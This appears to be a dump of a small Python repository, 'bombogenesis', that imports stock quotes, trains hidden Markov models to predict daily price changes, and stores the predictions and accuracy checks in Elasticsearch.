[ { "alpha_fraction": 0.5610322952270508, "alphanum_fraction": 0.5689823627471924, "avg_line_length": 31.967741012573242, "blob_id": "4d474f3ad6edf1a49799006bae0a2bb31dcc2866", "content_id": "c7e25ee719e28be3ce11126926a959c6cd7d6d4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8176, "license_type": "no_license", "max_line_length": 164, "num_lines": 248, "path": "/train.py", "repo_name": "chandrab/bombogenesis", "src_encoding": "UTF-8", "text": "import warnings\nimport logging\nimport itertools\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom hmmlearn.hmm import GaussianHMM, MultinomialHMM, GMMHMM\nfrom sklearn.model_selection import train_test_split\nfrom tqdm import tqdm\nfrom docopt import docopt\nfrom elasticsearch import helpers, Elasticsearch\nimport csv\nfrom pandas.io.json import json_normalize\nfrom datetime import datetime\nfrom objdict import ObjDict\nimport json\nimport datetime\n\nINDEX_NAME = 'predictions'\nTYPE_NAME = 'outcome'\nID_FIELD = 'date'\n\nquery = '''{\n\"query\": {\n\"bool\": {\n\"filter\": [\n{\n \"bool\": {\n \"filter\": [\n {\n \"bool\": {\n \"should\": [\n {\n \"match_phrase\": {\n \"ticker\": \"%s\"\n }\n }\n ],\n \"minimum_should_match\": 1\n }\n },\n {\n \"bool\": {\n \"should\": [\n {\n \"range\": {\n \"timestamp\": {\n \"%s\": \"%s\"\n }\n }\n }\n ],\n \"minimum_should_match\": 1\n }\n }\n ]\n }\n}\n],\n\"should\": [],\n\"must_not\": []\n}}}'''\n\nes = Elasticsearch()\n\nclass ESProxy(object):\n\n def delete_and_create_index(self):\n\n if es.indices.exists(INDEX_NAME):\n print(\"deleting '%s' index...\" % (INDEX_NAME))\n res = es.indices.delete(index = INDEX_NAME)\n\n request_body = {\n \"settings\" : {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 0\n }\n }\n print(\"creating '%s' index...\" % (INDEX_NAME))\n res = es.indices.create(index = INDEX_NAME, body = request_body)\n\nclass StockPredictor(object):\n\n def __init__(self, 
ticker, n_hidden_states=5, n_latency_days=10, n_steps_frac_change=50, n_steps_frac_high=30, n_steps_frac_low=10, n_iter=1000, verbose=False):\n\n self.verbose = verbose\n self.ticker = ticker\n self.n_latency_days = n_latency_days\n\n self.hmm = GMMHMM(n_components=n_hidden_states, n_iter=n_iter)\n\n self.fetch_training_data()\n self.fetch_latest_data() # to predict\n\n self._compute_allall_possible_outcomes(n_steps_frac_change, n_steps_frac_high, n_steps_frac_low)\n\n def fetch_latest_data(self):\n\n print(\"Fetching latest data ...\")\n res = es.search(index=\"market\", doc_type=\"quote\", size=10000, body={\"query\": {\"match\": {\"ticker\": self.ticker}}})\n latest_data = json_normalize(res['hits']['hits'])\n self.latest_data = latest_data.tail(1)\n if self.verbose: print(\"Latest data:\\n%s\" % self.latest_data)\n\n def fetch_training_data(self):\n\n print(\"Fetching training data ...\")\n res = es.search(index=\"market\", doc_type=\"quote\", size=10000, body={\"query\": {\"match\": {\"ticker\": self.ticker}}})\n self.training_data = json_normalize(res['hits']['hits'])\n self.training_data.drop(self.training_data.tail(1).index,inplace=True)\n print(\"%s records to train %s\" % (len(self.training_data.index), self.ticker))\n if self.verbose: print(\"Latest record for training:\\n%s\" % self.training_data.tail(1))\n\n # tbd - to use es instead\n #q = query % (self.ticker, \"lt\", datetime.date.today().strftime(\"%Y-%m-%d\"))\n #print(q)\n #res = es.search(index=INDEX_NAME, doc_type=TYPE_NAME, size=10000, body=query)\n\n @staticmethod\n def _extract_features(data):\n\n frac_change = np.array(data['_source.change']) #(close_price - open_price) / open_price\n frac_high = np.array(data['_source.change_high']) #(high_price - open_price) / open_price\n frac_low = np.array(data['_source.change_low']) #(open_price - low_price) / open_price\n\n return np.column_stack((frac_change, frac_high, frac_low))\n\n def fit(self):\n print('Extracting Features')\n feature_vector = 
StockPredictor._extract_features(self.training_data)\n if self.verbose: print(\"feature vector %s\" % feature_vector)\n print('Training Model with %s features' % feature_vector.size)\n print(\"Latest date to be used in training is %s\" % self.training_data.tail(1)['_source.timestamp'].values[0])\n self.hmm.fit(feature_vector)\n print('Model trained')\n\n def _compute_allall_possible_outcomes(self, n_steps_frac_change,\n n_steps_frac_high, n_steps_frac_low):\n frac_change_range = np.linspace(-0.1, 0.1, n_steps_frac_change)\n frac_high_range = np.linspace(0, 0.1, n_steps_frac_high)\n frac_low_range = np.linspace(0, 0.1, n_steps_frac_low)\n\n self.all_possible_outcomes = np.array(list(itertools.product(\n frac_change_range, frac_high_range, frac_low_range)))\n\n def json_data_for_outcome(self, day, outcome, score):\n\n rows = list()\n\n # meta\n ticker = day['_source.ticker']\n date = day['_source.timestamp']\n vector = outcome\n id = \"%s-%s-%s\" % (ticker, date, vector)\n\n meta = {\n \"index\": {\n \"_index\": INDEX_NAME,\n \"_type\": TYPE_NAME,\n \"_id\": id\n }\n }\n rows.append(json.dumps(meta))\n\n # data\n row = ObjDict()\n row.frac_change = outcome[0]\n row.frac_high_range = outcome[1]\n row.frac_low_range = outcome[2]\n open_price = day['_source.open'].values[0]\n predicted_close = open_price * (1 + outcome[0])\n expected_value = outcome[0] * score\n row.predicted_close = predicted_close\n row.expected_value = expected_value\n row.timestamp = day['_source.timestamp'].values[0]\n row.score = score\n row.ticker = day['_source.ticker'].values[0]\n rows.append(json.dumps(row))\n\n return rows\n\n def predict_outcomes(self):\n\n print(\"predicting outcomes for: %s\" % self.latest_data['_source.timestamp'].values[0])\n previous_testing_data = self.training_data.tail(self.n_latency_days).index\n\n if self.verbose:\n print(\"previous_testing_data %s\" % previous_testing_data)\n\n test_data = self.training_data.iloc[previous_testing_data]\n\n if self.verbose:\n 
print(\"Using the following slice of data:\")\n print(\"[%s]\" % previous_testing_data)\n print(test_data)\n\n test_data_features = StockPredictor._extract_features(test_data)\n\n # to blow everything away - may need to recreate/refresh indexes in ES!\n #self.delete_and_create_index()\n\n bulk_data = list()\n outcome_score = []\n\n for possible_outcome in self.all_possible_outcomes:\n\n test_feature_vectors = np.row_stack((test_data_features, possible_outcome))\n\n if self.verbose:\n print(\"Final test feature set:\")\n print(\"[%s]\" % test_feature_vectors)\n\n score = self.hmm.score(test_feature_vectors)\n\n # ignoring scores <= 0\n if score > 0:\n rows = self.json_data_for_outcome(self.latest_data, possible_outcome, score)\n bulk_data.append(rows)\n\n # format for ES, ugly\n es_array = \"\"\n for row in bulk_data:\n es_array += row[0]\n es_array += \"\\n\"\n es_array += row[1]\n es_array += \"\\n\"\n\n #print(\"Deleting prediction data for ... %s\" % day['_source.ticker'])\n #es.delete_by_query(index=INDEX_NAME,doc_type=TYPE_NAME, body={'query': {'match': {'ticker': day['_source.ticker']}}})\n\n print(\"Exporting predictions to ES\")\n if self.verbose: print(es_array)\n res = es.bulk(index = INDEX_NAME, body = es_array, refresh = True)\n\nif __name__ == '__main__':\n with open('nasdaq100list.csv', 'r') as f:\n reader = csv.reader(f)\n stocks = list(reader)\n for stock in stocks:\n ticker = stock[0]\n if ticker == \"Symbol\": continue\n try:\n stock_predictor = StockPredictor(ticker=ticker, verbose=False)\n stock_predictor.fit()\n stock_predictor.predict_outcomes()\n except:\n print(\"Failed to train models for %s\" % ticker)\n" }, { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7917932868003845, "avg_line_length": 49.61538314819336, "blob_id": "82deaf3f6379a12354eee263b7583c5e83cf6812", "content_id": "ce9b648ce36e72d0be8647dc562797fee289ab40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", 
"length_bytes": 658, "license_type": "no_license", "max_line_length": 321, "num_lines": 13, "path": "/README.md", "repo_name": "chandrab/bombogenesis", "src_encoding": "UTF-8", "text": "# bombogenesis\nStock Market Prediction using Python, Hidden Markov Models and ElasticSearch\n\n# Why the name ?\n\nI needed a name for my project and this week in Denver we're about to get hit with this winter storm:\n\nAccording to the description:\n\n_What's a \"bomb cyclone\"?\nA bomb cyclone is a real meteorological term. Bombogenesis is when a midlatitude cyclone rapidly intensifies 24 mb in 24 hours. This storm does have that potential! I personally don't love this term because it can get sensationalized on social media, but it is technically accurate and certainly looks likely with storm._\n\nI thought it was a pretty sweet term so used it for my project.\n" }, { "alpha_fraction": 0.5355227589607239, "alphanum_fraction": 0.5442359447479248, "avg_line_length": 29.040267944335938, "blob_id": "bd8fcd6fdbe3d774959628064bb58f66b189183e", "content_id": "2a2536a097714a9181852d265744020b25880741", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4476, "license_type": "no_license", "max_line_length": 110, "num_lines": 149, "path": "/import.py", "repo_name": "chandrab/bombogenesis", "src_encoding": "UTF-8", "text": "\"\"\"import.py\n\nUsage:\n import.py <ticker>\n\n\"\"\"\n\nfrom elasticsearch import helpers, Elasticsearch\nimport csv\nfrom pandas_datareader import data\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport json\nfrom objdict import ObjDict\nimport datetime\nimport time\nfrom hmmlearn.hmm import GaussianHMM\nimport numpy as np\nimport itertools\nfrom docopt import docopt\n\nINDEX_NAME = 'market'\nTYPE_NAME = 'quote'\nID_FIELD = 'date'\n\nes = Elasticsearch()\n\nclass Importer(object):\n\n def __init__(self, ticker):\n self.ticker = ticker\n\n def es_date_format(self, time):\n return 
time.strftime('%Y-%m-%dT06:00:00')\n\n def delete_and_create_index(self):\n\n if es.indices.exists(INDEX_NAME):\n print(\"deleting '%s' index...\" % (INDEX_NAME))\n res = es.indices.delete(index = INDEX_NAME)\n\n request_body = {\n \"settings\" : {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 0\n }\n }\n print(\"creating '%s' index...\" % (INDEX_NAME))\n res = es.indices.create(index = INDEX_NAME, body = request_body)\n\n def json_data_for_ticker(self, ticker, datasource, start_date, end_date):\n rows = list()\n dp = data.DataReader(ticker, datasource, start_date, end_date)\n for tuple in dp.iterrows():\n\n date = int(time.mktime(tuple[0].timetuple()))\n id = \"%s-%s\" % (date, ticker)\n meta = {\n \"index\": {\n \"_index\": INDEX_NAME,\n \"_type\": TYPE_NAME,\n \"_id\": id\n }\n }\n rows.append(meta)\n\n row = ObjDict()\n\n\n row.timestamp= self.es_date_format(tuple[0])\n row._timestamp= self.es_date_format(tuple[0])\n row.adjusted_close = tuple[1][5]\n row.ticker = ticker\n\n row.volume = tuple[1][4]\n open_price = tuple[1][2]\n close_price = tuple[1][3]\n high_price = tuple[1][0]\n low_price = tuple[1][1]\n row.open = open_price\n row.close = close_price\n row.high = high_price\n row.low = low_price\n row.change = (close_price - open_price) / open_price\n row.change_high = (high_price - open_price) / open_price\n row.change_low = (open_price - low_price) / open_price\n\n rows.append(json.dumps(row))\n\n return rows\n\n def fetch_data(self):\n start_date = '1990-01-01'\n end_date = datetime.date.today().strftime(\"%Y-%m-%d\")\n datasource = \"yahoo\"\n print(\"fetching data for %s between %s and %s\" % (self.ticker, start_date, end_date))\n data = self.json_data_for_ticker(self.ticker, datasource, start_date, end_date)\n self.data = data\n\n def import_data(self):\n es_array = \"\"\n for row in self.data:\n es_array += str(row)\n es_array += \"\\n\"\n print(\"importing ... 
%s\" % data)\n print(\"importing %s records to ES\" % len(self.data))\n\n res = es.bulk(index = INDEX_NAME, body = self.data, refresh = True)\n\n# arguments = docopt(__doc__, version='import 0.1')\n# ticker= arguments['<ticker>']\n\n# data = fetch_data(ticker)\n# import_data(data)\n\ndef delete_all_stock_data():\n print(\"Deleting all stock data\")\n es.delete_by_query(index=INDEX_NAME,doc_type=TYPE_NAME, body={'query': {'match_all': {}}})\n\ndef import_ticker(ticker, delete=False):\n\n if delete:\n print(\"Deleting stock data for ... %s\" % ticker)\n es.delete_by_query(index=INDEX_NAME,doc_type=TYPE_NAME, body={'query': {'match': {'ticker': ticker}}})\n\n importer = Importer(ticker)\n importer.fetch_data()\n importer.import_data()\n\n#import_ticker(\"MDLZ\", delete=True)\n\nif __name__ == '__main__':\n arguments = docopt(__doc__, version='import 0.1')\n ticker = arguments['<ticker>']\n if ticker == \"ALL\":\n delete_all_stock_data()\n print(\"Fetching all data\")\n with open('sp500.csv', 'r') as f:\n reader = csv.reader(f)\n stocks = list(reader)\n for stock in stocks:\n ticker = stock[0]\n if ticker == \"Symbol\": continue\n try:\n import_ticker(ticker, delete=False)\n except:\n print(\"Failed to import %s\" % ticker)\n else:\n import_ticker(ticker, delete=True)\n" }, { "alpha_fraction": 0.5840452909469604, "alphanum_fraction": 0.5919390916824341, "avg_line_length": 35.625850677490234, "blob_id": "8b11a838afe14c13d6383e5752ba6d9b44427007", "content_id": "43ef438aa54fa55561b1024bf0138d160382dfb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10768, "license_type": "no_license", "max_line_length": 208, "num_lines": 294, "path": "/train15.py", "repo_name": "chandrab/bombogenesis", "src_encoding": "UTF-8", "text": "\"\"\"train.py\n\nUsage:\n train.py <ticker> <date>\n\n\"\"\"\n\nimport warnings\nimport logging\nimport itertools\nimport pandas as pd\nimport numpy as np\n#import matplotlib.pyplot as plt\nfrom 
hmmlearn.hmm import GaussianHMM, MultinomialHMM, GMMHMM\nfrom sklearn.model_selection import train_test_split\nfrom tqdm import tqdm\nfrom docopt import docopt\nfrom elasticsearch import helpers, Elasticsearch\nimport csv\nfrom pandas.io.json import json_normalize\nfrom datetime import datetime, timedelta\nfrom objdict import ObjDict\nimport json\nimport datetime\n\nINDEX_NAME = 'predictions'\nTYPE_NAME = 'outcome'\nTRADE_TYPE_NAME = 'trades'\nTRADE_INDEX_NAME = 'recommendation'\nID_FIELD = 'date'\n\nes = Elasticsearch()\n\nclass ESProxy(object):\n\n def delete_and_create_index(self):\n\n if es.indices.exists(INDEX_NAME):\n print(\"deleting '%s' index...\" % (INDEX_NAME))\n res = es.indices.delete(index = INDEX_NAME)\n\n request_body = {\n \"settings\" : {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 0\n }\n }\n print(\"creating '%s' index...\" % (INDEX_NAME))\n res = es.indices.create(index = INDEX_NAME, body = request_body)\n\nclass StockPredictor(object):\n\n def __init__(self, ticker, chunks = 9, delta = 0, n_hidden_states=5, n_latency_days=10, n_steps_frac_change=10, n_steps_frac_high=30, n_steps_frac_low=10, n_iter=100, verbose=False, prediction_date=None):\n\n self.total_score = 0\n self.verbose = verbose\n self.ticker = ticker\n self.n_latency_days = n_latency_days\n self.hmm = GMMHMM(n_components=n_hidden_states, n_iter=n_iter)\n self.chunks = chunks\n self.delta = delta\n self.prediction_date = prediction_date\n self.fetch_training_data()\n self._compute_all_possible_outcomes(n_steps_frac_change, n_steps_frac_high, n_steps_frac_low)\n\n def fetch_training_data(self):\n\n print(\"Fetching training data ...\")\n res = es.search(index=\"market\", doc_type=\"quote\", size=10000, body={\"query\": {\"match\": {\"ticker\": self.ticker}}})\n self.training_data = json_normalize(res['hits']['hits'])\n self.chunked_training_data = self.training_data\n\n #vectors = []\n #chunked_training_data_lengths = []\n #start_index = 0\n #end_index = start_index + 
self.chunks\n #delta_date_index = end_index + self.delta\n\n #while delta_date_index <= len(self.training_data):\n #training_chunk = self.training_data[start_index:end_index]\n # delta_chunk = self.training_data.iloc[delta_date_index]\n # total_chunk = training_chunk.append(delta_chunk)\n # #print(\"%s training_chunk to train %s\" % (total_chunk, self.ticker))\n # start_index = end_index + 1\n # end_index = start_index + self.chunks\n # delta_date_index = end_index + self.delta\n # vectors.append(total_chunk)\n # chunked_training_data_lengths.append(len(total_chunk))\n # if self.verbose: print(total_chunk)\n\n #self.chunked_training_data = pd.DataFrame(np.concatenate(vectors), columns = self.training_data.columns)\n #self.chunked_training_data_lengths = chunked_training_data_lengths\n\n if self.verbose: print(\"Latest record for training:\\n%s\" % self.chunked_training_data.tail(1))\n latest_date = self.chunked_training_data.tail(1)['_source.timestamp']\n datetime_object = datetime.datetime.strptime(latest_date.values[0], '%Y-%m-%dT%H:%M:%S')\n\n if self.prediction_date == None:\n prediction_date = datetime_object + timedelta(days=self.delta + 1)\n self.prediction_date = datetime.datetime.strftime(prediction_date, '%Y-%m-%dT%H:%M:%S')\n\n @staticmethod\n def _extract_features(data):\n\n frac_change = np.array(data['_source.change']) #(close_price - open_price) / open_price\n frac_high = np.array(data['_source.change_high']) #(high_price - open_price) / open_price\n frac_low = np.array(data['_source.change_low']) #(open_price - low_price) / open_price\n\n return np.column_stack((frac_change, frac_high, frac_low))\n\n def fit(self):\n print('Extracting Features')\n feature_vector = StockPredictor._extract_features(self.chunked_training_data)\n if self.verbose: print(\"feature vector %s\" % feature_vector)\n print('Training Model with %s features' % feature_vector.size)\n print(\"Latest date to be used in training is %s\" % 
self.chunked_training_data.tail(1)['_source.timestamp'].values[0])\n #self.hmm.fit(feature_vector, self.chunked_training_data_lengths)\n self.hmm.fit(feature_vector)\n print('Model trained')\n\n def _compute_all_possible_outcomes(self, n_steps_frac_change,\n n_steps_frac_high, n_steps_frac_low):\n frac_change_range = np.linspace(-0.1, 0.1, n_steps_frac_change)\n frac_high_range = np.linspace(0, 0.05, n_steps_frac_high)\n frac_low_range = np.linspace(0, 0.05, n_steps_frac_low)\n\n self.all_possible_outcomes = np.array(list(itertools.product(\n frac_change_range, frac_high_range, frac_low_range)))\n\n def json_data_for_trade(self):\n\n rows = list()\n\n # meta\n ticker = self.ticker\n date = self.prediction_date\n total_score = self.total_score\n id = \"%s-%s-%s\" % (ticker, date, total_score)\n\n meta = {\n \"index\": {\n \"_index\": TRADE_INDEX_NAME,\n \"_type\": TRADE_TYPE_NAME,\n \"_id\": id\n }\n }\n rows.append(json.dumps(meta))\n\n # data\n row = ObjDict()\n row.total_score = total_score\n row.timestamp = self.prediction_date\n row.ticker = self.ticker\n rows.append(json.dumps(row))\n\n return rows\n\n def json_data_for_outcome(self, outcome, score):\n\n rows = list()\n\n # meta\n ticker = self.ticker\n date = self.prediction_date\n vector = outcome\n id = \"%s-%s-%s\" % (ticker, date, vector)\n\n meta = {\n \"index\": {\n \"_index\": INDEX_NAME,\n \"_type\": TYPE_NAME,\n \"_id\": id\n }\n }\n rows.append(json.dumps(meta))\n\n # data\n row = ObjDict()\n row.frac_change = outcome[0]\n row.frac_high_range = outcome[1]\n row.frac_low_range = outcome[2]\n open_price = self.training_data.tail(1)['_source.open'].values[0]\n predicted_close = open_price * (1 + outcome[0])\n expected_value = outcome[0] * score\n row.predicted_close = predicted_close\n row.expected_value = expected_value\n row.timestamp = self.prediction_date\n row.score = score\n row.chunks = self.chunks\n row.delta = self.delta\n row.score = score\n row.ticker = self.ticker\n 
rows.append(json.dumps(row))\n\n return rows\n\n def delete_prediction_data(self, ticker):\n print(\"Deleting prediction data for ... %s\" % self.ticker)\n es.delete_by_query(index=INDEX_NAME,doc_type=TYPE_NAME, body={'query': {'match': {'ticker': self.ticker}}})\n\n def predict_outcomes(self):\n\n print(\"predicting outcomes for: %s\" % self.prediction_date)\n previous_testing_data = self.training_data.tail(self.n_latency_days).index\n\n if self.verbose:\n print(\"previous_testing_data %s\" % previous_testing_data)\n\n test_data = self.training_data.iloc[previous_testing_data]\n\n if self.verbose:\n print(\"Using the following slice of data:\")\n print(\"[%s]\" % previous_testing_data)\n print(test_data)\n\n test_data_features = StockPredictor._extract_features(test_data)\n\n # to blow everything away - may need to recreate/refresh indexes in ES!\n #self.delete_and_create_index()\n\n bulk_data = list()\n trade_data = list()\n outcome_score = []\n\n for possible_outcome in self.all_possible_outcomes:\n\n test_feature_vectors = np.row_stack((test_data_features, possible_outcome))\n score = self.hmm.score(test_feature_vectors)\n\n # ignoring scores <= 0\n if score > 0:\n rows = self.json_data_for_outcome(possible_outcome, score)\n bulk_data.append(rows)\n\n if possible_outcome[0] > 0:\n self.total_score = self.total_score + score\n if possible_outcome[0] < 0:\n self.total_score = self.total_score - score\n trade_rows = self.json_data_for_trade()\n trade_data.append(trade_rows)\n\n print(\"Exporting predictions to ES\")\n\n es_array = self.format_data_for_es(bulk_data)\n res = es.bulk(index = INDEX_NAME, body = es_array, refresh = True)\n\n es_array = self.format_data_for_es(trade_data)\n res = es.bulk(index = TRADE_INDEX_NAME, body = es_array, refresh = True)\n\n def format_data_for_es(self, data):\n es_array = \"\"\n for row in data:\n es_array += row[0]\n es_array += \"\\n\"\n es_array += row[1]\n es_array += \"\\n\"\n return es_array\n\ndef 
delete_all_prediction_data():\n print(\"Deleting all PREDICTION data\")\n es.delete_by_query(index=INDEX_NAME,doc_type=TYPE_NAME, body={'query': {'match_all': {}}})\n\nif __name__ == '__main__':\n arguments = docopt(__doc__, version='train 0.1')\n ticker = arguments['<ticker>']\n date = arguments['<date>']\n\n if ticker == \"ALL\":\n print(\"Training all models\")\n\n if date == \"ALL\":\n delete_all_prediction_data()\n print(\"Fetching dates ...\")\n res = es.search(index=\"market\", doc_type=\"quote\", size=10000, body={\"query\": { \"range\" : { \"timestamp\" : { \"gte\" : \"2019-03-10T06:00:00\"}}}})\n rows = json_normalize(res['hits']['hits'])\n print(rows)\n for row in rows.iterrows():\n try:\n actual_date = row[1]['_source.timestamp']\n ticker = row[1]['_source.ticker']\n\n print(\"predicting %s on %s\" % (ticker, actual_date))\n stock_predictor = StockPredictor(ticker=ticker, verbose=False, chunks=9, delta = 0, prediction_date = actual_date)\n stock_predictor.fit()\n stock_predictor.predict_outcomes()\n\n except:\n print(\"Failed to train models for %s\" % ticker)\n else:\n\n stock_predictor = StockPredictor(ticker=ticker, verbose=False, chunks=9, delta = 0, prediction_date = date)\n #stock_predictor.delete_prediction_data(ticker)\n stock_predictor.fit()\n stock_predictor.predict_outcomes()\n" }, { "alpha_fraction": 0.5970394611358643, "alphanum_fraction": 0.6087582111358643, "avg_line_length": 31, "blob_id": "7ece05401fb188fa48f08b16e000a5e932961b41", "content_id": "831a0de0da71eec3cdb67a7eb10b46f3a6fd8b87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4864, "license_type": "no_license", "max_line_length": 161, "num_lines": 152, "path": "/accuracy.py", "repo_name": "chandrab/bombogenesis", "src_encoding": "UTF-8", "text": "\"\"\"accuracy.py\n\nUsage:\n accuracy.py\n\n\"\"\"\n\nimport warnings\nimport logging\nimport itertools\nimport pandas as pd\nimport numpy as np\n#import matplotlib.pyplot as 
plt\nfrom hmmlearn.hmm import GaussianHMM, MultinomialHMM, GMMHMM\nfrom sklearn.model_selection import train_test_split\nfrom tqdm import tqdm\nfrom docopt import docopt\nfrom elasticsearch import helpers, Elasticsearch\nimport csv\nfrom pandas.io.json import json_normalize\nfrom datetime import datetime, timedelta\nfrom objdict import ObjDict\nimport json\nimport datetime\n\nINDEX_NAME = 'predictions'\nTYPE_NAME = 'outcome'\nTRADE_TYPE_NAME = 'accuracy'\nTRADE_INDEX_NAME = 'accuracy'\nID_FIELD = 'date'\n\nes = Elasticsearch()\n\nclass ESProxy(object):\n\n def delete_and_create_index(self):\n\n if es.indices.exists(INDEX_NAME):\n print(\"deleting '%s' index...\" % (INDEX_NAME))\n res = es.indices.delete(index = INDEX_NAME)\n\n request_body = {\n \"settings\" : {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 0\n }\n }\n print(\"creating '%s' index...\" % (INDEX_NAME))\n res = es.indices.create(index = INDEX_NAME, body = request_body)\n\nclass AccuracyCalculator(object):\n\n def __init__(self, ticker, verbose=False, prediction_date=None):\n\n self.verbose = verbose\n self.ticker = ticker\n self.prediction_date = prediction_date\n self.fetch_data()\n self.calculate()\n\n def fetch_data(self):\n\n print(\"Fetching stock data ...\")\n res = es.search(index=\"market\", doc_type=\"quote\", size=10000, body={\"query\": {\"match\": {\"ticker\": self.ticker}}})\n self.stock_data = json_normalize(res['hits']['hits'])\n\n print(\"Fetching recommendation data ...\")\n res = es.search(index=\"recommendation\", doc_type=\"trades\", size=10000, body={\"query\": {\"match\": {\"ticker\": self.ticker}}})\n self.recommendation_data = json_normalize(res['hits']['hits'])\n\n def json_data_for_accuracy(self):\n\n rows = list()\n\n # meta\n ticker = self.ticker\n date = self.prediction_date\n prediction = self.prediction\n id = \"%s-%s-%s\" % (ticker, date, prediction)\n\n meta = {\n \"index\": {\n \"_index\": TRADE_INDEX_NAME,\n \"_type\": TRADE_TYPE_NAME,\n \"_id\": id\n }\n }\n 
rows.append(json.dumps(meta))\n\n # data\n row = ObjDict()\n row.result = self.result\n row.prediction = self.prediction\n row.prediction_date = self.prediction_date\n row.ticker = self.ticker\n row.accuracy = self.accuracy\n rows.append(json.dumps(row))\n\n return rows\n\n def calculate(self):\n\n accuracy_data = list()\n accuracy = False\n\n #print(\"total score for %s was %s, close that day was %s\" % (self.ticker, self.recommendation_data, self.stock_data))\n result = self.stock_data.loc[self.stock_data['_source.timestamp'] == self.prediction_date].tail(1)['_source.change'].values[0]\n prediction = self.recommendation_data.loc[self.recommendation_data['_source.timestamp'] == self.prediction_date].tail(1)['_source.total_score'].values[0]\n if result > 0 and prediction > 0: accuracy = True\n if result < 0 and prediction < 0: accuracy = True\n\n self.result = result\n self.prediction = prediction\n self.accuracy = accuracy\n print(\"accuracy:%s score %s result %s\" % (accuracy, prediction, result))\n\n accuracy_rows = self.json_data_for_accuracy()\n accuracy_data.append(accuracy_rows)\n\n print(\"Exporting accuracy to ES\")\n es_array = self.format_data_for_es(accuracy_data)\n res = es.bulk(index = TRADE_INDEX_NAME, body = es_array, refresh = True)\n\n def format_data_for_es(self, data):\n es_array = \"\"\n for row in data:\n es_array += row[0]\n es_array += \"\\n\"\n es_array += row[1]\n es_array += \"\\n\"\n return es_array\n\n\ndef delete_all_accuracy_data():\n print(\"Deleting all accuracy data\")\n es.delete_by_query(index=\"accuracy\",doc_type=\"accuracy\", body={'query': {'match_all': {}}})\n\nif __name__ == '__main__':\n # \"2019-01-02T06:00:00\"\n\n delete_all_accuracy_data()\n print(\"Fetching dates ...\")\n res = es.search(index=\"predictions\", doc_type=\"outcome\", size=10000, body={\"query\": { \"range\" : { \"timestamp\" : { \"gte\" : \"2019-03-10T06:00:00\"}}}})\n rows = json_normalize(res['hits']['hits'])\n print(rows)\n\n for row in 
rows.iterrows():\n actual_date = row[1]['_source.timestamp']\n ticker = row[1]['_source.ticker']\n print(\"calculating accuracy for %s on %s\" % (ticker, actual_date))\n accuracy_calculator = AccuracyCalculator(ticker=ticker, verbose=True, prediction_date = actual_date)\n accuracy_calculator.calculate()\n" } ]
5
eddyod/gdrive
https://github.com/eddyod/gdrive
c5ef935ee55fa5a834718c7361493e08ddf69ece
9802bfe6d24825714b7dc7f89363ba3346a314d7
4a50c32f5a16dd2804887f1bcafa8898e768ab7b
refs/heads/master
2020-04-27T13:54:13.516178
2019-03-07T17:16:59
2019-03-07T17:16:59
174,388,302
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7673797011375427, "alphanum_fraction": 0.7887700796127319, "avg_line_length": 52.42856979370117, "blob_id": "188bb6ec122f0eed789f3ea611df726e020a7cf4", "content_id": "6131467fe3fe8a2d4e279a6625d1a5be7db4f382", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 374, "license_type": "no_license", "max_line_length": 94, "num_lines": 7, "path": "/README.md", "repo_name": "eddyod/gdrive", "src_encoding": "UTF-8", "text": "This script is based on an issue from: \nhttps://stackoverflow.com/questions/38511444/python-download-files-from-google-drive-using-url\n\nI modified it to check for an existing file. If it finds the file, it\nwill continue from that point instead of downloading the whole file\nagain. Similar to what 'wget -c' does. My router was bombing out with\nlarge downloads. Thanks At&t!\n" }, { "alpha_fraction": 0.6076632738113403, "alphanum_fraction": 0.6125202178955078, "avg_line_length": 29.37704849243164, "blob_id": "f38b476abcc61929466b3e27d976ebc9490067de", "content_id": "26b93c9787c8f7dfb1de0f6ec9c73af921af0d6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1853, "license_type": "no_license", "max_line_length": 86, "num_lines": 61, "path": "/gdrive.py", "repo_name": "eddyod/gdrive", "src_encoding": "UTF-8", "text": "import requests\nfrom pathlib import Path\n\n\ndef download_from_gdrive(id, destination):\n def get_confirm_token(response):\n for key, value in response.cookies.items():\n if key.startswith('download_warning'):\n return value\n\n return None\n\n def save_response_content(response, destination, readwrite):\n CHUNK_SIZE = 32768\n\n with open(destination, readwrite) as f:\n for chunk in response.iter_content(CHUNK_SIZE):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n\n URL = \"https://docs.google.com/uc?export=download\"\n\n params = {}\n params['id'] = id\n session = 
requests.Session()\n response = session.get(URL, params=params, stream=True)\n token = get_confirm_token(response)\n\n if token:\n params['confirm'] = token\n else:\n print('No token, cannot continue')\n return\n\n filePath = Path(destination)\n\n if filePath.is_file():\n resume_byte_pos = filePath.stat().st_size\n print(\"File\", destination, \" already exists, size:\", resume_byte_pos)\n resume_header = {'Range': 'bytes=%d-' % resume_byte_pos}\n response = session.get(URL, params=params, stream=True, headers=resume_header)\n readwrite = \"ab\"\n else:\n print('File', destination, 'does not exist')\n response = session.get(URL, params=params, stream=True)\n readwrite = \"wb\"\n\n print(params)\n save_response_content(response, destination, readwrite)\n\n\nif __name__ == \"__main__\":\n import sys\n if len(sys.argv) != 3:\n print(\"Usage: python3 gdrive.py FILEID destination\")\n else:\n # TAKE ID FROM SHAREABLE LINK\n file_id = sys.argv[1]\n # DESTINATION FILE ON YOUR DISK\n destination = sys.argv[2]\n download_from_gdrive(file_id, destination)\n" } ]
2
jshutler/crypto_analysis
https://github.com/jshutler/crypto_analysis
05f4517fda15eb54ea9a30ad1eaab212e45a179e
e6d6b95db740410f53a741881f604a64e701c617
6070e4d0468ae336aa3bc874158044c1eee3d21c
refs/heads/master
2022-12-18T02:41:20.426824
2020-09-20T23:22:22
2020-09-20T23:22:22
285,857,450
